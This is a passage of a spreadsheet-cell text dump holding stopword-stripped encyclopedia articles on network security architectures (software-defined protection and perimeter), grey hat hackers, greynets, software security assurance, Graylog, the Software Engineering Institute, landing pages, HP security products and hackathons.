    <t>software-defined protection (sdp) computer network security architecture methodology combines network security devices defensive protections leverage internal external intelligence sources. infrastructure designed modular, scalable, secure. architecture partitions security infrastructure three interconnected layers. enforcement layer inspects traffic enforces protection within well-defined network segments. control layer generates security policies deploys protections enforcement points. management layer orchestrates infrastructure integrates security business processes. architecture supports traditional network security access control policy requirements, well threat prevention required enterprises implementing technologies mobile computing software-defined networking (sdn). enforcement layer enforcement layer enables organizations design segmented networks, implement physical virtual security enforcement points based upon segmentation, execute protection logic prescribed network segments. incorporates principal segmentation enforcement layer. segmentation divides network compartments different security characteristics. based upon segment requirements, security controls established threat containment recovery. enforcement points, platforms executing protections, must implemented boundaries segments enforce defined protection logic. enforcement points implemented network security gateways, host-based software, mobile device applications, virtual machines cloud. control layer control layer core architecture. role generate protections deploy execution appropriate enforcement points within enforcement layer. develop appropriate protections, control layer relies upon repositories data include knowledge organization information systems (access control), knowledge data assets classifications (data protection) knowledge threats (threat prevention). security solutions commonly implemented within control layer include firewall, anti-virus, application control, threat emulation, anti-bot, anti-spam email security, data loss prevention (dlp), intrusion prevention systems (ips). through systematic mapping protective controls associated risk segment assets within enforcement layer, organizations deliver multi-layer protection attacks. management layer management layer serves interface network administrators layers infrastructure. this layer supports enterprise segmentation enables definition access data control policies activation threat prevention separately. management layer also provides ability delegate management specific administrators work simultaneously. management layer provides visibility happening network, supports proactive incident response, provides intelligence required tailor security controls organization. references</t>
  </si>
  <si>
    <t>Software-defined perimeter</t>
  </si>
  <si>
    <t>software-defined perimeter (sdp), also called "black cloud", approach computer security evolved work done defense information systems agency (disa) global information grid (gig) black core network initiative around 2007. software-defined perimeter (sdp) framework developed cloud security alliance (csa) control access resources based identity. connectivity software defined perimeter based need-to-know model, device posture identity verified access application infrastructure granted. application infrastructure effectively “black” term meaning infrastructure cannot detected), without visible information addresses. inventors systems claim software defined perimeter mitigates common network-based attacks, including: server scanning, denial service, injection, operating system application vulnerability exploits, man-in-the-middle, pass-the-hash, pass-the-ticket, attacks unauthorized users. background premise traditional enterprise network architecture create internal network separated outside world fixed perimeter consists series firewall functions block external users coming allows internal users out. traditional fixed perimeters help protect internal services external threats simple techniques blocking visibility accessibility outside perimeter internal applications infrastructure. weaknesses traditional fixed perimeter model becoming ever problematic popularity user-managed devices phishing attacks, providing untrusted access inside perimeter, saas iaas extending perimeter internet. software defined perimeters address issues giving application owners ability deploy perimeters retain traditional model's value invisibility inaccessibility outsiders, deployed anywhere internet, cloud, hosting center, private corporate network, across locations. authorization techniques there several techniques delivering software-defined perimeter (sdp). this includes: single packet authorization single packet sent client gateway listens packets. contents packet decrypted inspection. verified, gateway adds rule firewall mutual connection intended service established. once connection established, firewall rules removed making service invisible outside world. first packet authentication: single-use, cryptographically generated identity token inserted side tcp/ip session authentication. allowed, gateway applies security policy forward, redirect, discard connection request based identity. authenticate before connect: endpoints bootstrapped unique, cryptographically generated identities (commonly using x509 jwts). they establish outbound connectivity mesh overlay ‘listens’ authenticated authorized endpoints. this approach ensures source destination never require inbound connectivity well work even challenging scenarios. architecture simplest form, architecture consists components: hosts controllers.[6] hosts either initiate connections accept connections. these actions managed interactions controllers control channel (see figure thus, software defined perimeter, control plane separated data plane enable greater scalability. addition, components redundant higher availability. framework following workflow (see figure controllers brought online connected appropriate optional authentication authorization services (e.g., pki, device fingerprinting, geolocation, saml, openid, oauth, ldap, kerberos, multifactor authentication, services). accepting hosts brought online. these hosts connect authenticate controllers. however, acknowledge communication host respond non-provisioned request. each initiating host brought line connects with, authenticates controllers. after authenticating initiating host, controllers determine list accepting hosts initiating host authorized communicate. controller instructs accepting hosts accept communication initiating host well optional policies required encrypted communications. controller gives initiating host list accepting hosts well optional policies required encrypted communications. initiating host initiates mutual connection authorized accepting hosts. deployment modelswhile general workflow remains implementations, application sdps favor certain implementations others. client-to-gateway client-to-gateway implementation, servers protected behind accepting host accepting host acts gateway clients protected servers. this implementation used inside enterprise network mitigate common lateral movement attacks server scanning, application vulnerability exploits, password cracking, man-in-the-middle, pass-the-hash (pth), others. alternatively, implemented internet isolate protected servers unauthorized users mitigate attacks denial service, application vulnerability exploits, password cracking, man-in-the-middle, others. client-to-server client-to-server implementation similar features benefits client-to-gateway implementation discussed above. however, case, server protected running accepting host software instead gateway sitting front server running software. choice client-to-gateway implementation client-to-server implementation typically based number servers protected, load balancing methodology, elasticity servers, similar topological factors.[13] server-to-server server-to-server implementation, servers offering representational state transfer (rest) service, simple object access protocol (soap) service, remote procedure call (rpc), kind application programming interface (api) internet protected unauthorized hosts network. example, case, server initiating rest call would initiating host server offering rest service would accepting host. implementing case reduce load services mitigate attacks similar ones mitigated client-to-gateway implementation. client-to-server-to-client client-to-server-to-client implementation results peer-to-peer relationship clients used applications telephone, chat, video conferencing. cases, obfuscates addresses connecting clients. minor variation, user also client-to-gateway-to-client configuration user wishes hide application server well. applications enterprise application isolation data breaches involve intellectual property, financial information, data, sets data available within enterprise network, attackers gain entrance internal network compromising computers network move laterally access high value information asset. case, enterprise deploy inside data center partition network isolate high-value applications. unauthorized users network access protected application, thus mitigating lateral movement attacks depend private cloud hybrid cloud while useful protecting physical machines, software overlay nature also allows integrated private clouds leverage flexibility elasticity environments. role, sdps used enterprises hide secure public cloud instances isolation, unified system includes private public cloud instances and/or cross-cloud clusters. software-as-a-service (saas) vendors protect services. implementation, software service would accepting host, users desiring connectivity service would initiating hosts. this allows saas leverage global reach internet without enabling internet's global attack surface. infrastructure-as-a-service (iaas) vendors offer sdp-as-a-service protected on-ramp customers. this allows customers take advantage agility cost savings iaas mitigating wide range potential attacks. platform-as-a-service (paas) vendors differentiate offering including architecture part service. this gives users embedded security service mitigates network-based attacks. vast number devices connected internet. back-end applications manage devices and/or extract information devices mission-critical custodian private sensitive data. sdps used hide servers interactions internet provide improved security up-time. also advanced encryption standard global information grid ipsec public-key infrastructure transport layer security references external links cloud security alliance “introduction software defined perimeter working group” article 1105 public sector media group "black cloud darkens enterprise authorized devices" article light reading "verizon vidder sd-perimeter around enterprise security" article "goodbye nac. hello, software defined perimeter" ieee "software-defined perimeters: architectural view sdp" article computerweekly "gas distribution network invests software-defined perimeter" moubayed, abdallah; refaey, ahmed; shami, abdallah (october 2019). "software-defined perimeter (sdp): state secure solution modern network". ieee network. (5): 226–233. doi:10.1109/mnet.2019.1800324. s2cid 189892671.</t>
  </si>
  <si>
    <t>Ledger (journal)</t>
  </si>
  <si>
    <t>ledger first peer-reviewed academic journal dedicated cryptocurrency blockchain technology research. journal covers topics relate cryptocurrencies bitcoin. this includes aspects mathematics, computer science, engineering, law, economics philosophy. focus according wilmer "blockchain technology research." funded coin center, nonprofit.the journal open access. published university library system university pittsburgh cosponsored university pittsburgh press. creation idea journal born discussion managing editors peter rizun christopher wilmer, bitcoin forum bitcointalk.org. wilmer envisioned ledger journal "people passionate technology, publish research." wilmer called question reliability 'white papers' became common cryptocurrency boom. according wilmer, ledger journal receives four submissions week, many poor quality. “occasionally submissions citations." wilmer's vision ledger traditional peer review system.a call papers issued september 2015 deadline december 2015. however, delayed formalising review process. inaugural issue published december 2016. related persons organizations rizun physicist entrepreneur, lives vancouver, canada.wilmer assistant professor swanson school engineering’s chemical petroleum engineering department. author bitcoin befuddled. wilmer first used bitcoin purchase honey caramels beekeeper.the university pittsburgh featured documentary rise rise bitcoin. references external links official website</t>
  </si>
  <si>
    <t>Grey hat</t>
  </si>
  <si>
    <t>grey (greyhat gray hat) computer hacker computer security expert sometimes violate laws typical ethical standards, usually malicious intent typical black hacker. term came late 1990s, derived concepts "white hat" "black hat" hackers. when white hacker discovers vulnerability, exploit permission divulge existence fixed, whereas black illegally exploit and/or tell others grey neither illegally exploit tell others so.a difference among types hacker lies methods discovering vulnerabilities. white breaks systems networks request employer explicit permission purpose determining secure hackers, whereas black break system network order uncover sensitive information personal gain. grey generally skills intent white break system network without permission.according definition grey-hat hacker, discover vulnerability, instead telling vendor exploit works, offer repair small fee. when gains illegal access system network, suggest system administrator friends hired problem; however, practice declining increasing willingness businesses prosecute. another definition grey maintains grey hackers arguably violate effort research improve security: legality according particular ramifications hacks participate in.in search engine optimization (seo) community, grey hackers manipulate websites' search engine rankings using improper unethical means considered search engine spam. history phrase grey first publicly used computer security context announced first scheduled black briefings 1996, although used smaller groups prior time. moreover, conference presentation given mudge, member hacking group l0pht, discussed intent grey hackers provide microsoft vulnerability discoveries order protect vast number users operating system. finally, mike nash, director microsoft's server group, stated grey hackers much like technical people independent software industry "they valuable giving feedback make products better".the phrase grey used hacker group l0pht 1999 interview york times describe hacking activities. phrase used describe hackers support ethical reporting vulnerabilities directly software vendor contrast full disclosure practices prevalent white community vulnerabilities disclosed outside group.in 2002, however, anti-sec community published term refer people work security industry day, engage black activities night. irony black hats, interpretation seen derogatory term; whereas amongst white hats term lent sense popular notoriety. following rise eventual decline full disclosure anti-sec "golden era"—and subsequent growth "ethical hacking" philosophy—the term grey began take sorts diverse meanings. prosecution u.s. dmitry sklyarov activities legal home country changed attitudes many security researchers. internet became used critical functions, concerns terrorism grew, term "white hat" started referring corporate security experts support full disclosure.in 2008, defined grey hats ethical security researchers inadvertently arguably violate effort research improve security. they advocate computer offense laws clearer narrowly drawn. examples april 2000, hackers known "{}" "hardbeat" gained unauthorized access apache.org. they chose alert apache crew problems rather damage apache.org servers.in june 2010, group computer experts known goatse security exposed flaw at&amp;t security allowed e-mail addresses ipad users revealed. group revealed security flaw media soon notifying at&amp;t. since then, opened investigation incident raided house weev, group's prominent member.in april 2011, group experts discovered apple iphone ipads "logging user visits". apple released statement saying ipad iphone logging towers phone could access. there numerous articles matter viewed minor security issue. this instance would classified "grey hat" although experts could used malicious intent, issue nonetheless reported.in august 2013, khalil shreateh, unemployed computer security researcher, hacked facebook page mark zuckerberg order force action correct discovered allowed post user's page without consent. tried repeatedly inform facebook told facebook issue bug. after incident, facebook corrected vulnerability could powerful weapon hands professional spammers. shreateh compensated facebook's white program violated policies, thus making grey incident. also anonymous (group) computer crime cyber warfare hacktivism risk metasploit mischief penetration test references further reading daniel regalado; shon harris; allen harper; chris eagle; jonathan ness; branko spasojevic; ryan linn stephen sims (2015). gray hacking ethical hacker's handbook (4th ed.). york: mcgraw-hill education. isbn 978-0-07-183238-0. (2014). grey 2014: most effective safest techniques developers. secrets rank high including fastest penalty recoveries. research asin b00h25o8rm.</t>
  </si>
  <si>
    <t>Greynet</t>
  </si>
  <si>
    <t>within context corporate organizational networks, greynet grayware) elusive networked computer application downloaded installed user systems without express permission network administrators often without awareness cognition deeply embedded organization’s network fabric. these applications marginal user, inevitably consume system network resources. addition, greynet applications often open door systems become compromised additional applications, security risks malware. examples public instant messaging (aol instant messenger, windows live messenger, yahoo! messenger) conferencing (webcam, voip telephony) peer-to-peer (p2p) file sharing clients distributed computing seti@home adware "utilities" commercial spyware keystroke logging dynamics greynet growth computer workstations become connected internet, variety programs proliferated offer ability extend communications, gather deliver information, serve needs marketing concerns. among first emerge instant messaging clients icq, instant messenger messenger. developments technology added video capability webcam units, worked together take advantage available bandwidth single, small network, corporate environments. growth greynets takes advantage software hardware developments. informal networks appearing provide variety streaming media content supplied modified users. emerging category "podcasting", users generate content widespread download portable players. problems greynet programs problem greynet programs fourfold. first, greynet programs create network security risks causing broad vectors malware dissemination. second, create privacy issues network opening large holes information leakage. third, greynet programs create compliance issues computer network creating invisible parallel communications network. fourth, create issues local machines consumption local system resources possible operating system program stability concerns. things increase network administration time costs. added corporate work environment loss meaningful production time non-work related distractions greynet applications. individual network environment policies vary non-existent full lockdown user system privileges. "risks liabilities" section instant messaging detailed overview threats, risks, solutions problems prevalent greynet programs, public dealing security aspects greynets emergence specific administrative software packages monitor control traffic, well enhancement security suites adware clients. security monitoring among first prevalent specific administrative software packages products secure networks threats borne networks. these products first introduced 2002, protect u.s. corporations. references dostart, kate (april 2007). "instant messaging threats become sophisticated". searchvoip.com. kerner, sean michael (november 2006). "greynets getting greyer". internetnews.com. joyce, erin (august 2005). "spyware skyrockets greynet fuel". internetnews.com.</t>
  </si>
  <si>
    <t>Software security assurance</t>
  </si>
  <si>
    <t>software security assurance process helps design implement software protects data resources contained controlled software. software resource thus must afforded appropriate security. what software security assurance? software security assurance (ssa) process ensuring software designed operate level security consistent potential harm could result loss, inaccuracy, alteration, unavailability, misuse data resources uses, controls, protects. software security assurance process begins identifying categorizing information contained used software. information categorized according sensitivity. example, lowest category, impact security violation minimal (i.e. impact software owner's mission, functions, reputation negligible). category, however, impact pose threat human life; irreparable impact software owner's missions, functions, image, reputation; result loss significant assets resources. once information categorized, security requirements developed. security requirements address access control, including network access physical access; data management data access; environmental controls (power, conditioning, etc.) off-line storage; human resource security; audit trails usage records. what causes software security problems? security vulnerabilities software result security bugs, defects, within software. cases, defects created primary causes: non-conformance, failure satisfy requirements; error omission software requirements. non-conformance, failure satisfy requirements non-conformance simple–the common coding error defect–or complex (i.e., subtle timing error input validation error). important point non-conformance verification validation techniques designed detect security assurance techniques designed prevent them. improvements methods, software security assurance program, improve security software. errors omissions software requirements serious security problems software-based systems develop software requirements incorrect, inappropriate, incomplete system situation. unfortunately, errors omissions requirements difficult identify. example, software perform exactly required normal use, requirements correctly deal system state. when system enters problem state, unexpected undesirable behavior result. this type problem cannot handled within software discipline; results failure system software engineering processes developed allocated system requirements software. software security assurance activities there basic types software security assurance activities. some focus ensuring information processed information system assigned proper sensitivity category, appropriate protection requirements developed system. others focus ensuring control protection software, well software support tools data.at minimum, software security assurance program ensure that: security evaluation performed software. security requirements established software. security requirements established software development and/or operations maintenance (o&amp;m) processes. each software review, audit, includes evaluation security requirements. configuration management corrective action process place provide security existing software ensure proposed changes inadvertently create security violations vulnerabilities. physical security software adequate. building security improving software development process building better software ways improve software security, producing software fewer defects vulnerabilities. first-order approach identify critical software components control security-related functions special attention throughout development testing process. this approach helps focus scarce security resources critical areas. tools techniques there many commercial off-the-shelf (cots) software packages available support software security assurance activities. however, used, tools must carefully evaluated effectiveness must assured. common weaknesses enumeration improve software security gain better understanding common weaknesses affect software security. with mind, current community-based program called common weaknesses enumeration project, sponsored mitre corporation identify describe weaknesses. list, currently preliminary form, contains descriptions common software weaknesses, faults, flaws. security architecture/design analysis security architecture/design analysis verifies software design correctly implements security requirements. generally speaking, four basic techniques used security architecture/design analysis. logic analysis logic analysis evaluates equations, algorithms, control logic software design. data analysis data analysis evaluates description intended usage data item used design software component. interrupts effect data receive special attention ensure interrupt handling routines alter critical data used routines. interface analysis interface analysis verifies proper design software component's interfaces components system, including computer hardware, software, end-users. constraint analysis constraint analysis evaluates design software component restrictions imposed requirements real-world limitations. design must responsive known anticipated restrictions software component. these restrictions include timing, sizing, throughput constraints, input output data limitations, equation algorithm limitations, design limitations. secure code reviews, inspections, walkthroughs code analysis verifies software source code written correctly, implements desired design, violate security requirements. generally speaking, techniques used performance code analysis mirror used design analysis. secure code reviews conducted development phase determine whether established security requirements, security design concepts, security-related specifications satisfied. these reviews typically consist presentation material review group. secure code reviews effective conducted personnel directly involved development software reviewed. informal reviews informal secure code reviews conducted as-needed basis. conduct informal review, developer simply selects reviewer(s) provides and/or presents material reviewed. material informal pseudo-code hand-written documentation. formal reviews formal secure code reviews conducted development phase software component. client software appoints formal review group, make affect "go/no-go" decision proceed next step software development life cycle. inspections walkthroughs secure code inspection walkthrough detailed examination product step-by-step line-by-line source code) basis. purpose conducting secure code inspections walkthroughs find errors. typically, group inspection walkthrough composed peers development, security engineering quality assurance. security testing software security testing, includes penetration testing, confirms results design code analysis, investigates software behaviour, verifies software complies security requirements. special security testing, conducted accordance security test plan procedures, establishes compliance software security requirements. security testing focuses locating software weaknesses identifying extreme unexpected situations could cause software fail ways would cause violation security requirements. security testing efforts often limited software requirements classified "critical" security items. also secure design computer security security engineering software protection references</t>
  </si>
  <si>
    <t>Group (database)</t>
  </si>
  <si>
    <t>group name service database used store group information unix-like operating systems. sources group database (and hence sources groups system) configured, like name service databases, nsswitch.conf. seeing available groups unix system contents group database (and available groups) seen variety tools: command line getent command used fetch group information. fetching list available groups getent group fetching specific group specific group called 'users': getent group users python group database python module</t>
  </si>
  <si>
    <t>Graylog</t>
  </si>
  <si>
    <t>graylog, management software company based houston, texas. their main product management software also called graylog (styled graylog). history graylog, formerly torch, founded 2009 lennart koopmann began open-source project hamburg, germany. headquarters houston, texas.in october 2014, mercury made initial investment graylog. e.ventures mercury asset management later investors. investors crosslink capital, draper associates high-tech gründerfonds.graylog released first commercial offering 2016 making enterprise product available. 2018, graylog grown 35,000 installations worldwide.graylog regularly participates conferences con, derbycon, black usa, nolacon, security bsides. graylog management software graylog software centrally captures, stores, enables real-time search analysis terabytes machine data component infrastructure applications. software uses three-tier architecture scalable storage based elasticsearch mongodb. also datadog splunk elasticsearch sumo logic syslog-ng references</t>
  </si>
  <si>
    <t>Software Engineering Institute</t>
  </si>
  <si>
    <t>software engineering institute (sei) american research development center headquartered pittsburgh, pennsylvania. activities cover cybersecurity, software assurance, software engineering acquisition, component capabilities critical united states department defense. authority carnegie mellon software engineering institute federally funded research development center headquartered campus carnegie mellon university pittsburgh, pennsylvania, united states. also offices washington, arlington, virginia; angeles, california. operates major funding u.s. department defense. also works industry academia research collaborations.on november 1984, u.s. department defense elected carnegie mellon university host site software engineering institute. institute founded initial allocation million, another million allocated subsequent five years. sei's contract department defense subject review renewal every five years. program work conducted several principal areas: cybersecurity, software assurance, software engineering acquisition, devops, component capabilities critical department defense. areas work defines specific initiatives aimed improving organizations' software engineering capabilities. management practices organizations need effectively manage acquisition, development, evolution (ade) software-intensive systems. success software engineering management practices helps organizations predict control quality, schedule, cost, cycle time, productivity. best-known example management practices sei's capability maturity model (cmm) software (now capability maturity model integration (cmmi)). cmmi approach consists models, appraisal methods, training courses proven improve process performance. 2006, version cmmi product suite included release cmmi development. cmmi development first three constellations defined version 1.2: others include cmmi acquisition cmmi services. cmmi services constellation released february 2009. another management practice developed cert, part sei, resilience management model (cert-rmm). cert-rmm capability model operational resilience management. version resilience management model released 2010. engineering practices work engineering practices increases ability software engineers analyze, predict, control selected functional non-functional properties software systems. tools methods include architecture tradeoff analysis method (atam) method, framework software product line practice, service migration reuse technique (smart). security also home cert/cc (cert coordination center), federally funded computer security organization. cert program's primary goals ensure appropriate technology systems-management practices used resist attacks networked systems limit damage ensure continuity critical services spite successful attacks, accidents, failures. cert program working us-cert produce build security (bsi) website, provides guidelines building security every phase software development lifecycle. also conducted research insider threats computer forensics. results research information populate cert virtual training environment. special programs partner network partner network helps disseminate software engineering best practices. organizations individuals partner network selected, trained, licensed deliver authentic services, include courses, consulting methods, management processes. network currently consists nearly partner organizations worldwide. conferences sponsors national international conferences, workshops, user-group meetings. other events cover subjects including acquisition software-intensive systems, commercial off-the-shelf (cots)-based systems, network security survivability, software process research, software product lines, cmmi, team software process. education training courses currently offered sei's locations united states europe. addition, using licensed course materials, partners train individuals. membership program membership program helps software engineering community network. members include small business owners, software systems programmers, ceos, directors, managers fortune companies government organizations affiliate program through affiliate program, organizations place technical experts periods ranging months four years. affiliates currently working projects identify, develop, demonstrate improved software engineering practices. software process achievement award program order recognize outstanding achievement improving organization's ability create evolve software-dependent systems, ieee computer society created software process achievement award program. addition rewarding excellence, purpose award foster continuous advancement practice software engineering disseminate insights, experiences, proven practices throughout relevant research practitioner communities. research publications publishes reports offer technical information software engineering topics, whether theoretical applied. also publishes books software engineering industry, government military applications practices. addition, offers public courses, workshops, conferences process improvement, software architecture product lines, security. controversies november 2015, head project accused software engineering institute aiding federal bureau investigation uncovering identities users network. later prosecution showed hack paid department defense subpoena fbi. focus progressive protests occasional site anti-war movement peace movement protests, many organized pittsburgh's thomas merton center. references popular culture served blackgate prison 2012 film dark knight rises. also software engineer personal software process (psp) team software process (tsp) references further reading fenton, edwin (2000). carnegie mellon 1900–2000: centennial history. pittsburgh: carnegie mellon university press. isbn 0-88748-323-2. external links official website</t>
  </si>
  <si>
    <t>Landing page</t>
  </si>
  <si>
    <t>online marketing, landing page, sometimes known "lead capture page", "single property page", "static page", "squeeze page" "destination page", single page appears response clicking search engine optimized search result, marketing promotion, marketing email online advertisement. landing page usually display directed sales copy logical extension advertisement, search result link. landing pages used lead generation. actions visitor takes landing page determines advertiser's conversion rate. landing page part microsite single page within organization's main site. landing pages often linked social media, e-mail campaigns, search engine marketing campaigns, high quality articles "affiliate account" order enhance effectiveness advertisements. general goal landing page convert site visitors sales leads. goal obtain lead, landing page include method visitor contact company, usually phone number inquiry form. sale required, landing page usually link visitor click, send shopping cart checkout area. analyzing activity generated linked url, marketers click-through rates conversion rate determine success advertisement. types there types landing pages: reference transactional. references reference landing page presents information relevant visitor. these display text, images, dynamic compilations relevant links elements. idea isolate visitor landing page distractions, like full website menu "similar products", surround visitor available information targeted product convince take action captured. "references" landing page type transitional stage second type "transactional" type. transactional purpose transactional landing page persuade visitor take action completing transaction. this accomplished providing form needs filled out. visitor information obtained order visitor's email address mailing list prospect. email campaign developed based responses transactional landing pages. goal capture much information visitor possible. ultimate goal convert visitor customer. origin landing pages originated departments microsoft late 2003 response poor online sales office. process tedious time-consuming. result, 2009, several startups, including unbounce, formed simplify streamline process. rise cloud computing e-commerce around 2009 provided ideal conditions startups flourish. since customer requirements changed, requesting integrations solutions email marketing, lead nurturing customer relationship management systems. typical format landing pages often contain clear, concise action-oriented headlines. good landing page explains product offer clear manner places visual emphasis value product service presented. marketing experts recommend websites remove navigation menu limit internal external links page. signup forms landing page reflect value offer. example, free offer newsletter sign form request email address, whereas high value offers longer forms details required. they also include relevant image, animation short video. these pages also tend contain small icons (i.e. facebook twitter) facilitate social media sharing. smart links with proliferation competing social media music distribution platforms minimal landing page referred smart link appeared. these short url, typically shared existing fans, leads landing page links content multiple different platforms enabling customers choose complete transaction. optimization landing page optimization (lpo) part broader internet marketing process called conversion optimization conversion rate optimization (cro), goal improving percentage visitors website becomes sales leads customers. landing page webpage displayed potential customer clicks advertisement search engine result link. this webpage typically displays content relevant extension advertisement link. aims provide page content appearance makes webpage appealing target audiences. there three major types based targeting: associative content targeting (also called rule-based optimization passive targeting). page content modified based information obtained visitor's search criteria, geographic information source traffic known generic parameters used explicit non-research-based consumer segmentation. predictive content targeting (also called active targeting). page content adjusted correlating known information visitor (e.g., prior purchase behavior, personal demographic information, browsing patterns, etc.) anticipate (desired) future actions based predictive analytics. consumer directed targeting (also called social targeting). page content created using relevance publicly available information mechanism based reviews, ratings, tagging, referrals, etc.there major types based experimentation: closed-ended experimentation. consumers exposed several variations landing pages, altering elements like headlines, formatting layout behavior observed attempt remove distractions take lead away page, including primary navigation. conclusion experiment, optimal page selected based outcome experiment. open-ended experimentation. this approach similar closed-ended experimentation except variations added testing experimentation stop winner found. this method used large corporations dynamically improve conversion rates improve user experience. landing page also adjusted dynamically experiment results change enhance user experience. experimentation-based experimentation-based achieved using testing, multivariate total-experience testing. these methodologies applicable closed- open-ended experimentation. testing testing, split testing, method testing versions webpage: version version "b". goal test multiple versions webpages (e.g. home page, product page faq) specific element changes variation variation (such lead form left-hand side placed right-hand side), determine version appealing/effective. this testing method also known a/b/n split testing; denoting tests measured compared. data testing usually measured click-through rate alternative conversion tracking method.testing conducted sequentially parallel. sequential testing, often easiest implement, various versions webpages made available online specified time period. parallel (split) testing, versions made available traffic divided two. results sequential split testing skewed differing time periods traffic patterns different tests run. testing following advantages: inexpensive existing resources tools used. simple complex statistical analysis required.a/b testing following disadvantages: difficult control external factors (e.g., campaigns, search traffic, press releases, seasonality) using sequential testing. very limited reliable conclusions cannot drawn pages contain multiple elements vary version. multivariate testing multivariate landing page optimization (mvlpo) accounts multiple variations visual elements (e.g., graphics, text) page. example, given page choices title, choices featured image graphic choices company logo. this example yields k×m×n landing page configurations.significant improvements seen testing different copy text, form layouts, landing page images background colours. however, elements produce improvements conversions looking results different tests, possible identify elements consistently tend produce greatest increase conversions.the first application experimental design mvlpo performed moskowitz jacobs inc. 1998 simulation/demonstration project lego. mvlpo become mainstream approach 2003 2004.mvlpo following advantages: provides reliable, scientifically based approach understanding customers' preferences optimizing experience. evolved easy-to-use approach much involvement required. many cases, lines javascript allow remote vendor servers control changes, collect data analyze results. provides foundation open-ended experimentation.mvlpo following disadvantages: quantitative consumer research, danger gigo (garbage garbage out). ideas sourced known customer touchpoints strategic business objectives needed obtain optimal results. focuses optimizing page time. website experiences sites involve multiple pages, typically complex. e-commerce website, typical successful purchase involve twelve eighteen pages; support site, even pages often required. total-experience testing total-experience testing, experience testing, type experiment-based testing entire website experience visitor examined using technical capabilities website platform (e.g., atg, blue martini software, etc.). rather creating multiple websites, total-experience testing uses website platform create several persistent experiences monitors preferred customers.an advantage total-experience testing reflects customer's total website experience, experience single page. disadvantages total-experience testing requires website platform supports experience testing, takes longer obtain results testing mvlpo. “f-like” layout various tracking tools proven people scan webpages various patterns, common desktop mobile letter shape. this means website visitors left side screen first place move parts screen line line. result, developers including important website content first lines first words website text improve visitors understanding overall content. message matching message matching idea matching pre-click message post-click message landing page. goal message matching create landing page directs individuals page product subject expecting. this could done displaying statement visitors using keywords right images landing page found advertisement clicked on.the messaging page reinforces reason click, reducing removing confusion therefore increasing conversion rates. this improves overall user experience reduces bounce rate (individuals leaving site without converting navigating another portion site) page. good message matching increase conversion many cases. design matching design matching takes design display repeats landing page. ensuring look, feel sentiment order smooth transition clicking completing conversion. also references external links landing page blog</t>
  </si>
  <si>
    <t>HP Enterprise Security Products</t>
  </si>
  <si>
    <t>micro focus enterprise security products business part software business micro focus. enterprise security products built acquired companies fortify software, arcsight, tippingpoint atalla (from acquisition 3com), bought 2010 2011. since sold tippingpoint announced intention divest entire enterprise software business unit spinning merging micro focus. merge concluded september 2017. products arcsight fortify security technologies designed scan network activity data offer customers real-time application-level threat detection. arcsight provides security information event management (siem). fortify provides application protection combination static dynamic application security testing.atalla products cryptographic solutions management solutions.tippingpoint products provide network defence system. announced september 2013, tippingpoint next-generation firewall (ngfw) designed block risks introduced cloud mobile computing. divestiture sale enterprise sold tippingpoint trend micro october 2015, approximately $300 million.on september 2016, whitman announced software assets hewlett packard enterprise, including enterprise security products, would spun merged micro focus create independent company enterprise shareholders would retain majority ownership. micro focus kevin loosemore called transaction "entirely consistent established acquisition strategy focus efficient management mature infrastructure products" indicated micro focus intended "bring core earnings margin mature assets deal cent total cent today micro focus's existing cent level within three years." protect customer event 2004, introduced annual event customers called protect, focuses security compliance issues. protect 2013 took place september 16–19 washington d.c. protect 2014 scheduled occur september 8–11, 2014 washington, d.c. also arcsight atalla fortify tippingpoint references external links micro focus enterprise security products official website</t>
  </si>
  <si>
    <t>HackTX</t>
  </si>
  <si>
    <t>hacktx 24-hour annual hackathon hosted freetail hackers, computer science student organization university texas austin.hacktx open college students held university texas austin's campus. history hacktx started 2012, student members hacker lounge technology entrepreneurship society wanted host hackathon would gather students companies austin, community. hackathon invention marathon, students gather create solution problem, a.k.a. hack. hacktx invites students backgrounds participate whether beginners non-technical majors. cover costs event, hacktx organizers raise capital sponsoring companies. companies provided opportunities interact student hackers forms mentoring recruiting. hacktx begins keynote address participants demonstration sponsor apis. participants begin building projects, 'hacking'. projects software based, hardware based, combination two. participants encouraged work teams members. after hours, participants submit projects judgement. hacktx winners hacktx 2012 first hacktx held university texas austin's campus austin october 19–20, 2012. attracted attendees. october 2012, engineers university texas surrounding area gathered hours university texas austin's student activity center celebration guests freely engaged open unrestrained software hardware development. university's technology entrepreneurship society hacker lounge teamed create event, combining best entrepreneurship creative hacking ability university. founder capital factory veteran austin tech investor, josh baer, commented largest hackathon seen austin.first place winners, lynx labs, developed music visualization software using microsoft kinect sensor five google nexus tablets. second place team five samsung monitors multi-factor identification physical entry device. third place team developed automated flashcard application help students study tests prize three apple tv's. special prizes went product market potential, trivialmobile.com, application builds mobile website information submitted email. award creative project went rapid image transformation application windows, dubbed ‘instagram right-clicking.’ twilio gave spheros team built software control 200-pound robot using text messages. context.io awarded live tickets team built email analytics visualization software.other supporters included murchison chair free enterprise, events co-sponsorship committee, ridescout, vmware, returnpath, alsop louie, palantir, microsoft, homeaway, infochimps, rackspace, twilio communications indeed.com. hacktx 2013 second hacktx held university texas austin's campus austin november 15–16, 2013. some supports included microsoft, google, andreessen horowitz, ebay more. hacktx 2013 yielded noteworthy ideas, prototypes, business plans. there greater hackers attendance 24-hour event competing create innovative hack. finalists presented today front room peers judges, brett hurt, josh baer, metcalfe. whistlehero guitar hero whistling. this built completely html javascript. comments made potential used fine-tune whistling skills, learn skill itself. relevant xkcd relevant xkcd funny presentation team serious potential search engine technology fuzzy searching searching exact results known. alert meet alert meet aims solve room reservation problem found libraries co-working spaces. steve lyons used series motion detectors users know reserved rooms fact empty available. references external links official website</t>
  </si>
  <si>
    <t>Hackathon</t>
  </si>
  <si>
    <t>hackathon (also known hack day, hackfest, datathon codefest; portmanteau hacking marathon) sprint-like design event wherein computer programmers others involved software development, including graphic designers, interface designers, product managers, project managers, domain experts, others collaborate intensively software projects. goal hackathon create functioning software hardware event. hackathons tend specific focus, include programming language used, operating system, application, api, subject demographic group programmers. cases, restriction type software created design system. etymology word "hackathon" portmanteau words "hack" "marathon", "hack" used sense exploratory programming, alternate meaning reference breaching computer security. openbsd's apparent first term referred cryptographic development event held calgary june 1999, developers came together avoid legal problems caused export regulations cryptographic software united states. since then, three events year occurred around world advance development, generally university campuses. microsystems, usage referred event javaone conference june june 1999; john gage challenged attendees write program java palm using infrared port communicate people using palm register internet. starting late 2000s, hackathons became significantly widespread began increasingly viewed companies venture capitalists quickly develop software technologies, locate areas innovation funding. some major companies born hackathons, groupme, began project hackathon techcrunch disrupt 2010 conference; 2011 acquired skype million. software phonegap began project iphonedevcamp (later renamed iosdevcamp) 2008; company whose engineers developed phonegap, nitobi, refocused around phonegap, nitobi bought adobe 2011 